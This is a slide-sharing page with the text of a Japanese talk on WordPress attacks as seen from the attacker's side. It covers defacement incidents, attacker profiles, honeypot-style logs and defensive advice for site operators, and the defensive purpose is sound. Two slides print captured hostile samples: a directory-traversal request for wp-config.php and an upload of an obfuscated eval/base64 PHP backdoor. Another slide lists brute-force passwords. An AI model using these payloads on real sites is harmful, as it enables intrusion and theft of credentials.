Suche senden
Hochladen
攻撃者からみたWordPressセキュリティ
•
3 gefällt mir
•
2,620 views
yoshinori matsumoto
Folgen
攻撃者からみたWordPressセキュリティ
Weniger lesen
Mehr lesen
Ingenieurwesen
Melden
Teilen
Melden
Teilen
1 von 21
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
Word press セキュリティ show!!
Word press セキュリティ show!!
yoshinori matsumoto
防御から謝罪まで・・・WordPressにヤマを張るっ!
防御から謝罪まで・・・WordPressにヤマを張るっ!
yoshinori matsumoto
WordPressセキュリティの心配事を吹き飛ばせ! WordCamp Kansai 2016
WordPressセキュリティの心配事を吹き飛ばせ! WordCamp Kansai 2016
yoshinori matsumoto
CON5898 What Servlet 4.0 Means To You
CON5898 What Servlet 4.0 Means To You
Edward Burns
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
John Allspaw
はじめてのマーケットプレイス
はじめてのマーケットプレイス
yoshinori matsumoto
Happy status Coding
Happy status Coding
yoshinori matsumoto
社内合宿成果発表
社内合宿成果発表
yoshinori matsumoto
Empfohlen
Word press セキュリティ show!!
Word press セキュリティ show!!
yoshinori matsumoto
防御から謝罪まで・・・WordPressにヤマを張るっ!
防御から謝罪まで・・・WordPressにヤマを張るっ!
yoshinori matsumoto
WordPressセキュリティの心配事を吹き飛ばせ! WordCamp Kansai 2016
WordPressセキュリティの心配事を吹き飛ばせ! WordCamp Kansai 2016
yoshinori matsumoto
CON5898 What Servlet 4.0 Means To You
CON5898 What Servlet 4.0 Means To You
Edward Burns
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
John Allspaw
はじめてのマーケットプレイス
はじめてのマーケットプレイス
yoshinori matsumoto
Happy status Coding
Happy status Coding
yoshinori matsumoto
社内合宿成果発表
社内合宿成果発表
yoshinori matsumoto
Android解析勉強会 #2 広告収入モジュール編
Android解析勉強会 #2 広告収入モジュール編
yoshinori matsumoto
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
yoshinori matsumoto
第1回Androidアプリ解析勉強会XXX解析チーム
第1回Androidアプリ解析勉強会XXX解析チーム
yoshinori matsumoto
この秋何かつくる人のためのセキュリティ事情
この秋何かつくる人のためのセキュリティ事情
yoshinori matsumoto
イベント管理サイト応用するよ
イベント管理サイト応用するよ
yoshinori matsumoto
OSSで地域貢献 - 加古川起源説 -
OSSで地域貢献 - 加古川起源説 -
yoshinori matsumoto
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
yoshinori matsumoto
セキュリティビジュアライゼーション - LT Spiral #04
セキュリティビジュアライゼーション - LT Spiral #04
yoshinori matsumoto
ペアプロしてきた
ペアプロしてきた
yoshinori matsumoto
SECCON つくば ハッカソン発表
SECCON つくば ハッカソン発表
yoshinori matsumoto
社内勉強会 20120518
社内勉強会 20120518
yoshinori matsumoto
春のチキチキjQuery祭り - 姫路IT系勉強会
春のチキチキjQuery祭り - 姫路IT系勉強会
yoshinori matsumoto
Weitere ähnliche Inhalte
Mehr von yoshinori matsumoto
Android解析勉強会 #2 広告収入モジュール編
Android解析勉強会 #2 広告収入モジュール編
yoshinori matsumoto
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
yoshinori matsumoto
第1回Androidアプリ解析勉強会XXX解析チーム
第1回Androidアプリ解析勉強会XXX解析チーム
yoshinori matsumoto
この秋何かつくる人のためのセキュリティ事情
この秋何かつくる人のためのセキュリティ事情
yoshinori matsumoto
イベント管理サイト応用するよ
イベント管理サイト応用するよ
yoshinori matsumoto
OSSで地域貢献 - 加古川起源説 -
OSSで地域貢献 - 加古川起源説 -
yoshinori matsumoto
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
yoshinori matsumoto
セキュリティビジュアライゼーション - LT Spiral #04
セキュリティビジュアライゼーション - LT Spiral #04
yoshinori matsumoto
ペアプロしてきた
ペアプロしてきた
yoshinori matsumoto
SECCON つくば ハッカソン発表
SECCON つくば ハッカソン発表
yoshinori matsumoto
社内勉強会 20120518
社内勉強会 20120518
yoshinori matsumoto
春のチキチキjQuery祭り - 姫路IT系勉強会
春のチキチキjQuery祭り - 姫路IT系勉強会
yoshinori matsumoto
Mehr von yoshinori matsumoto
(12)
Android解析勉強会 #2 広告収入モジュール編
Android解析勉強会 #2 広告収入モジュール編
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
第1回Androidアプリ解析勉強会XXX解析チーム
第1回Androidアプリ解析勉強会XXX解析チーム
この秋何かつくる人のためのセキュリティ事情
この秋何かつくる人のためのセキュリティ事情
イベント管理サイト応用するよ
イベント管理サイト応用するよ
OSSで地域貢献 - 加古川起源説 -
OSSで地域貢献 - 加古川起源説 -
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
セキュリティビジュアライゼーション - LT Spiral #04
セキュリティビジュアライゼーション - LT Spiral #04
ペアプロしてきた
ペアプロしてきた
SECCON つくば ハッカソン発表
SECCON つくば ハッカソン発表
社内勉強会 20120518
社内勉強会 20120518
春のチキチキjQuery祭り - 姫路IT系勉強会
春のチキチキjQuery祭り - 姫路IT系勉強会
攻撃者からみたWordPressセキュリティ
1.
攻撃者からみた WordPressセキュリティ @ym405nm さくらのビアバッシュ in 元町
D.E.P. 2015/03/19 加筆修正 : 2015/03/20
2.
目次 •現状 •攻撃者を勝手にプロファイリング •運用者の対策 •まとめ •おまけ?
3.
現状
4.
現状 • 2013年9月 ロリポップの
WordPress が一斉に改 ざんされる • 約8,000件のサイトが 被害に • サイト名が 「Hacked by Krad Xin」 等に改ざん
5.
現状 • 2015年3月複数のサイトが改ざん ※ タイポ修正w http://www3.nhk.or.jp/news/html/20150311/k10010011751000.html
6.
攻撃者を勝手にプロファイリング
7.
誰がやってるのか? • ハクティビスト • 政治的主張など、自分たちの主張を通すためにサイトを 改ざんする •
改ざんしたものを目立つようにアピールする • マルウェア配布者 • 難読化したスクリプトなどを仕込み訪問者にマルウェア 感染させる • 標的型攻撃者グループ • 使用するマルウェアのホスティングとして使用する • C&Cサーバとして使用する
8.
なぜ攻撃者がWordPressを狙うのか • 圧倒的なユーザ数 • 行き届かないユーザ管理 •
100人以上の編集者を抱えるサイト • 編集者、管理者の面識がほとんどないサイト • サードパーティ製ソフトウェアの普及 • テーマやプラグイン • セキュリティレベルはそれぞれの開発者に依存する
9.
どのように狙われているのか • 攻撃者は弱そうな WordPress
を狙っている • wp-content? • wp-admin? • 脆弱なソフトウェアを使用しているサイトを探す • メーリングリスト • 脆弱性売買サイト ※ただし WordPress 関連の脆弱性は 無料で配布されていることが多い データを集めてみた
10.
どのように狙われているのか 10 攻撃者 WP WP WP BOT サイトとか Proxy
Proxy Proxy ログ解析 投稿 収集 攻撃/スキャン 送信
11.
こんなサイトです
12.
こういうふうに攻撃してくるゾ • アカウントクラッキング • wp-config.php
情報の窃取 • ファイルアップロード
13.
こういうふうに攻撃してくるゾ 試行パスワード 回数 [server-name]123456 96 [server-name]123
49 [server-name][server-name] 48 [server-name]000000 48 [server-name]111 48 [server-name]111111 48 [server-name]1234 48 [server-name]12345 48 [server-name]12345678 48 [server-name]123abc 48 [server-name]222 48 [server-name]222222 48 [server-name]333 48 [server-name]444 48 [server-name]555 48 [server-name]555555 48 [server-name]666 48 [server-name]666666 48 ※ 2014年3月~5月計測 傾向は期間によって若干異なります
14.
こういうふうに攻撃してくるゾ POST /wp-content/themes/(THEME)/dl-skin.php HTTP/1.1 User-Agent:
Mozilla/5.0 (X11; Linux amd64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36 Host: server Accept-Encoding: gzip Referer: http://server/wp-content/themes/ (THEME) /dl-skin.php Accept-Charset: utf-8,windows-1251;q=0.7,*;q=0.6 Accept-Language: en-us,en;q=0.8 Keep-Alive: 300 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.4 Content-Length: 60 Content-Type: application/x-www-form-urlencoded ( PARAM )=..%2F..%2F..%2F..%2F..%2Fwp-config.php ディレクトリトラバーサルの脆弱性を使用して wp-config.php の内容を読み取ろうとしている
15.
こういうふうに攻撃してくるゾ Content-Disposition: form-data; name="Filedata";
filename="ifire.php" Content-Type: text/plain <?php eval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX5FBk RxZn0f6q3Gcs+2Ys/abIVOPpfXmRTXvz5R4hjYd08eetcBFr0pQjoAYzFmIynUXP1twBDkLIVp 9ku+c7Gx5lyEF*******sO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d 1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ=="))); ?> 既知のファイルアップロード機能に認証がない脆弱性を使用して PHPファイルをアップロードしようとしている アップロードされたファイルは バックドア(攻撃者専用の裏口)として動作する
16.
運用者の対策
17.
運用者の対策 • アカウントの管理をしっかりする • パスワードは強度なものにする •
テーマ / プラグインの選定をする • メンテナンス頻度 • 脆弱性情報への対応頻度 • 不要なものは使用しない • セキュリティ拡張機能やセキュリティアプライアン スの導入を検討する • セキュリティ関連のプラグインに脆弱性があることも…
18.
運用者の対策 • あわせて対策したい • サーバの選定 •
ログの確認(ログイン履歴、アクセスログ) • 脆弱性情報の収集
19.
まとめ
20.
まとめ • 今後もWordPressに対する攻撃は減らない • 攻撃者は既知のテーマ
/ プラグインの脆弱性を使 用することが多い • アカウントの管理や、テーマ / プラグインの管理 をしっかりとする 安全なWordPressライフを!
21.
ご清聴ありがとうございました • Contact Mail :
y-matsumoto@kdl.co.jp Twitter : ym405nm Facebook : facebook.com/ym405nm
Jetzt herunterladen